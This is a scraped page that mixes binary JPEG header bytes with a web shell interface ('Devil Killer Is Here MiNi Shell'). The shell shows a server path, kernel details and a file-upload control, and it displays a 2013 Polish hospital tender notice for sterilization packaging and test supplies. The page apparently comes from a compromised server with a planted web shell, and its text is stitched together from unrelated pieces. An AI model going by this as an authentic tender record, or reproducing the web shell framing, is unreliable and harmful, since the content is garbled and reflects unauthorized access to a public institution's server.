JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130315/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130315/105540-N-2013.html

<p class="kh_header"><b>Poznań: Zakup i dostawa opakowań do sterylizacji.</b><br>
<b>Numer ogłoszenia: 105540 - 2013; data zamieszczenia: 15.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wielkopolskie Centrum Onkologii , ul. Garbary 15, 61-866 Poznań, woj. wielkopolskie, tel. 061 8540500, faks 061 8521948.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wco.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa opakowań do sterylizacji..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia/wymagania techniczne
Pakiet 1.
1.	Test kontrolujący energię ultradźwiękową ,dający natychmiastowy wynik poprzez zmianę  koloru z zielonego na żółty.  Ilość w opakowaniu - 30 szt.  Opakowań -  60 szt. 
2.	Gotowy do użycia jednorazowy test służący do kontroli skuteczności działania myjko- dezynfektorów. Substancja wskaźnikowa symulująca skład krwi ludzkiej umieszczona na stalowej płytce, zamknięta w plastikowej obudowie .Możliwość wpinania testu do koszy narzędziowych,12 testów w opakowaniu opakowań - 100 szt. 
2.	Test do kontroli ATP , odczytywany w systemie  SURE PLUS / szpital posiada system i oprogramowanie /test do kontroli zanieczyszczeń na powierzchni , dający wynik po 15 sek.  Ilość 2000 szt.
3.	Test do kontroli ATP , odczytywany w systemie SURE PLUS  / szpital posiada system i oprogramowanie /  test do kontroli zanieczyszczeń w wodzie , dający wynik po 15 sek . Ilość  2000 szt. 
4.	Plomby do kontenerów typu Wagner , plastikowe kolor zielony , pakowane po 500 szt.  Ilość - 20 opak. 

Pakiet  2  
1. Rękawy papierowo- foliowe do sterylizacji 
Opis produktu :
Jednorazowe opakowania do sterylizacji i przechowywania materiałów wysterylizowanych tzw. papier -folia . Gramatura papieru  medycznego 60g/m2 , folia wielowarstwowa ,kompozyt poliestru i polipropylenu o grubości powyżej 50 ?m . Na bokach opakowań nadruki testów chemicznych do sterylizacji parą wodną , oraz tlenkiem etylenu, opisy w języku polskim . 
Opakowanie musi odpowiadać normie PN-EN 868 ,ISO-11607 potwierdzone opinią niezależnej jednostki notyfikowanej ,temperatura zgrzewu opakowania  musi mieścić się w granicach 170- 180  o C, na produkcie musi się znajdować numer serii , musi być zaznaczony kierunek otwierania opakowania . 
Dystrybutor/ oferent  jest zobowiązany podać dane producenta rękawów , świadectwo zgodności z Dyrektywą CE 93/42, dane dotyczące produktu przedstawione w tabeli, a przede wszystkim zawartość metali ciężkich wytrzymałość na rozciąganie wzdłuż i w poprzek na sucho i na mokro , ilość warstw folii bez warstwy kleju , czas przydatności do użytku. 
WIELKOŚCI   ZAMÓWIENIA 
Rękawy papierowo- foliowe : 
7,5 cm/ 200 m - 15 szt. 
10 cm / 200 m - 15 szt.
12 cm / 200 m - 15 szt.
15 cm / 200 m - 15 szt.
20 cm / 200 m  - 15 szt.
30 cm / 200 m - 10  szt. 
40 cm / 200 m - 20 szt.
42 cm / 100 m - 30 szt. 

Rękawy z fałdą - rozmiar 40 cm x8 cm x100m  - 30 szt 

Pakiet 3. 
 Opakowania papierowo - foliowe do sterylizacji.
Opis produktu 
1. Jednorazowe opakowania do sterylizacji  parą wodną oraz  tlenkiem etylenu o konstrukcji , wykonania zgodnej z normami PN-EN-868 ,  ISO- 11607 potwierdzona opinią niezależnej jednostki notyfikowanej , papier o gramaturze  60-70 g/m2, wymagana charakterystyka materiału potwierdzająca parametry wystawiona przez producenta 
Folia wielowarstwowa / bez warstwy kleju / , wymagana charakterystyka folii
Wszystkie napisy w języku polskim, napisy i testy na parę , tlenek etylenu poza przestrzenią  pakowania, między warstwami folii. Jednoznacznie oznaczony kierunek otwierania, na produkcie musi znajdować się numer serii. Dystrybutor, lub producent zobowiązany jest przedstawić świadectwo zgodności z  Dyrektywą CE 93/42, rejestr wyrobów medycznych . zawartość metali ciężkich, wytrzymałość na rozciąganie wzdłuż i w poprzek na sucho i mokro , czas przydatności do użytku - dane zawarte w tabeli , 
Zgrzew  fabryczny wielokrotny .
Rozmiary  ? 5 % w centymetrach 
 5  x 25  -  1 2 tyś szt.
7,5 x15   -  24 tyś  szt. 
7,5 x20  -   12 tyś szt. 
7,5 x25  -   24 tyś szt.
7,5 x 30  - 48 tyś  szt.
7,5x 27 - 24 tyś  szt. 
10  x25  -  24 tyś szt.
10x27 -  24 tyś  szt. 
10x30  - 24 tyś  szt.
10 x 40 - 12  tyś  szt. 
12x40-  24 tyś  szt. 
15x 20 - 12 tyś  szt. 
15x27 -36 tyś szt.
15x 32 -12 tyś szt. 
15x38 -24 tyś szt. 
21x28 -36 tyś szt. 
21x32 -36 tyś szt.
21 x40 - 36 tyś szt. 
25 x36 -12 tyś szt. 
25 x 38 - 40 tyś szt. 
30 x50 - 36 tyś szt.

2. Taśma do zamykania pakietów sterylizacyjnych wykonana z papieru krepowanego z naniesioną warstwą kleju o szerokości  18 mm i powyżej   ze wskaźnikiem  sterylizacji parą wodną 
Długość  rolki 50 m - 60  -ilość 50  szt 
3. Rękawy z polyolefinu 90g/m2 i folii , bez fałdy  , gwarantujące bezpyłowe otwarcie spełniające normę PN-EN -868 , temperatura zgrzewu  - 135° C , otwierane na całej długości zgrzewu 
Rozmiary w centymetrach ?5% 
42 x 700 - 45 szt. 
21x 700 -  45 szt. 
32 x 700 - 45 szt. 

Pakiet 4. 
Materiały eksploatacyjne do sterylizacji 
1. Wskaźnik chemiczny zintegrowany do kontroli wsadu 
w procesie sterylizacji parą wodną, pokryty polimerem, samoprzylepny, z symetrycznie rozłożoną substancją wskaźnikową na długości testu wraz z   2 szt. przyrządu testowego  procesu zgodnym z normą 
PN EN 867-5 z rurką i kapsułą ze stali kwasoodpornej w obudowie z tworzywa sztucznego.
Ilość - 2500 sztuk wskaźników 
2. Silikonowe rękawice ochronne pięciopalczaste 
Wytrzymałość na temperaturę do 240° C, możliwość  mycia w myjni , oraz możliwość sterylizacji , długość  rękawicy - 35cm lub dłuższa , rozmiar uniwersalny, wymagane znak CE - ilość 6 szt. 
3. Plastikowe etykiety na tace sterylizacyjne , wykonane z tworzywa odpornego na warunki sterylizacji parą wodną 
- rozmiar 3x3 cm z zaczepem na kosz lub tacę sterylizacyjną 
- pakowane po 25 szt. w kolorze niebieskim, zielonym ,żółtym, pomarańczowym i białym 
Ilość - 10 szt./ po 2 szt. z każdego koloru
4. Taśma do drukarki kodów kreskowych z naniesionym wskaźnikiem sterylizacji nadtlenkiem wodoru , zgodnie z normą EN-ISO - 11140 -1 , długość  taśmy na gilzie - 60m , szerokość taśmy 7 cm , średnica gilzy -7,5 cm -  20  szt.

Pakiet 5.
1.Torebki typu  Integra wykonane z SMS o gramaturze min. 47 g/m ze wskaźnikiem sterylizacji  parą wodną , spełniające zapisy normy ISO - 11607-1 - rozmiar 42x72 cm - zielone - ilość 2000 szt.
2.Torebki typu  Integra wykonane z SMS o gramaturze min. 47 g/m ze wskaźnikiem sterylizacji  parą wodną ,spełniające zapisy normy ISO - 11607-1- rozmiar 47x75 cm - niebieskie - ilość 2000 szt.
3. Torebki typu  Integra wykonane z SMS o gramaturze min. 47 g/m ze wskaźnikiem sterylizacji  parą wodną ,spełniające zapisy normy ISO - 11607-1- rozmiar 38.5 x43 cm - zielone - ilość 2000 szt.
4. Torebki typu  Integra wykonane z SMS o gramaturze min. 47 g/m ze wskaźnikiem sterylizacji  parą wodną, spełniające zapisy normy ISO - 11607-1, - rozmiar 42x47  cm - niebieskie - ilość 2000 szt.
5. Papier naprzemiennie pakowany - kolor biało/ bursztynowy , 100% biodegradowalny , bez zawartości chloru.
Gramatura papieru sterylizacyjnego do 60g/m2, porowatość odpowiednia dla sterylizacji parą wodną i tlenkiem etylenu . Termin przydatności do użytku po sterylizacji - 180 dni , potwierdzona przez producenta papieru , zgodność z normą - EN-868-1, i ISO-11607 potwierdzona opinią  niezależnej  jednostki notyfikowanej 
75 x 75 cm- pakowany po 250 szt. - ilość 3000 szt.
100x 100 cm-pakowany po 250 szt. - ilość 3000 szt. 
120x120 cm- pakowany po 250 szt. - ilość 3000 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.19.80.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. 
W celu wykazania spełnienia w/w warunku należy złożyć:
	Oświadczenie o spełnieniu warunku 
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wiedza i doświadczenie
W celu wykazania spełnienia w/w warunku należy złożyć:
	Oświadczenie o spełnieniu warunku 
Ocena spełnienia warunku udziału w postępowaniu będzie dokonana na zasadzie spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potencjał techniczny
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania odpowiednim potencjałem technicznym. 
W celu wykazania spełnienia ww. warunku należy złożyć: 
	Oświadczenie o spełnieniu warunków.
Ocena spełniania warunku udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Osoby zdolne do wykonania zamówienia
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia. 
W celu wykazania spełnienia ww. warunku należy złożyć: 
	Oświadczenie o spełnieniu warunków .
Ocena spełniania warunku udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sytuacja ekonomiczna i finansowa
W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają warunki i wymagania określone wart. 22 ust. 1 ww. ustawy.
W celu wykazania spełnienia ww. warunku należy złożyć:
	Oświadczenie o spełnieniu warunku 
Ocena spełniania warunku udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Wykaz oświadczeń lub dokumentów, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu 
         1.W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy Prawo zamówień publicznych (t.j. Dz. U. z 2010 r. Nr 113, poz. 759, z późn. zm.), należy przedłożyć:

Lp.	Wymagany dokument
1	Oświadczenie o braku podstaw do wykluczenia
Oświadczenie o braku podstaw do wykluczenia - zgodnie z załącznikiem do siwz
2	Aktualny odpis lub oświadczenie
Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy
       2. W celu wykazania spełniania przez Wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych (t.j. Dz. U. z 2010 r. Nr 113, poz. 759, z późn. zm.), należy przedłożyć:
Lp.	Wymagany dokument
1	Oświadczenie o spełnieniu warunków
Oświadczenie o spełnieniu warunków - zgodnie z załącznikiem do siwz
3.	Dokumenty wyszczególnione w pkt V Specyfikacji na zasadach w nim określonych.
4.	Dokumenty podmiotów zagranicznych:
Lp.	Wymagany dokument
1	Dokument potwierdzający, że nie otwarto jego likwidacji ani nie ogłoszono upadłości
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert
2	Dokument potwierdzający, że nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert
3	Dokument potwierdzający, że nie orzeczono wobec niego zakazu ubiegania się o zamówienie
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert
4	Zaświadczenie w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia
5.	Inne wymagane dokumenty:

Lp.	Wymagany dokument
1	Formularz ofertowy  wg zał.
2	Formularz cenowy  wg zał.
3	Pełnomocnictwo
Pełnomocnictwo do podpisania oferty. Pełnomocnictwo należy załączyć do oferty tylko w przypadku, gdy oferta jest podpisania przez osobę nie figurującą w rejestrze lub wpisie do ewidencji działalności gospodarczej. Brak podpisu na ofercie lub podpisanie oferty przez osobę do tego nieupoważnioną spowoduje konieczność odrzucenia oferty. W przypadku składnia oferty przez podmioty występujące wspólnie, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego jeżeli oferta nie jest podpisana przez wszystkich Wykonawców występujących wspólnie. Postępowanie o udzielenie zamówienia publicznego nie jest postępowaniem sądowym, stwierdzić należy, że złożenie dokumentu pełnomocnictwa lub prokury albo jego odpisu, wypisu lub kopii przez pełnomocnika wykonawcy w postępowaniu o udzielenie zamówienia publicznego nie podlega opłacie skarbowej.
4
	Alternatywnie  dokument poniżej:
	Deklaracja Wytwórcy (Producenta) o spełnieniu wymagań zasadniczych dla wyrobów medycznych oraz Certyfikat Jednostki Notyfikowanej (jeżeli dotyczy)  dla oferowanego przedmiotu zamówienia osobno
	Dokument  potwierdzający  dokonanie zgłoszenia do Rejestru Wyrobów Medycznych  i  Podmiotów Odpowiedzialnych za ich wprowadzenie do obrotu i do używania - w formie świadectwa rejestracji  wyrobu (jeżeli dotyczy wyrobu), a w przypadku  wyrobów nie podlegających obowiązkowi zgłoszenia dokument potwierdzający wywiązanie się wytwórcy z obowiązku nałożonego ustawą z dnia 20 maja 2010r o wyrobach medycznych (Dz. U.  z  2010 r., Nr 107, poz. 679 z późn. zm)
Dokumenty, o których mowa powyżej muszą posiadać termin ważności obejmujący cały okres realizacji zamówienia. W przypadku, gdy ważność dokumentu wygasa w trakcie realizacji dostaw, wykonawca zobowiązany jest dołączyć do oferty dodatkowy dokument deklarujący złożenie we właściwym czasie wniosku o przedłużenie ważności pozwolenia. 
	Oświadczenie o klasyfikacji wyrobu, o ile nie wynika to z ww. dokumentów

5
	Oświadczenie o przekazaniu części zamówienia podwykonawcom wg wzoru stanowiącego załącznik do niniejszej specyfikacji. Stosownie do dyspozycji art. 36 ust. 5 ustawy Prawo zamówień publicznych - Zamawiający nie określa, która część zamówienia nie może być powierzona podwykonawcom
6	Katalogi/broszury/foldery w języku polskim  potwierdzające parametry techniczne zaoferowanego przedmiotu zamówienia, zgodnie z opisem podanym w   załączniku nr 7 do siwz oraz dokumenty wymagane w tym załączniku.
7	Listę podmiotów należących do tej samej grupy kapitałowej albo informację o tym, że Wykonawca nie należy do grupy kapitałowej.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


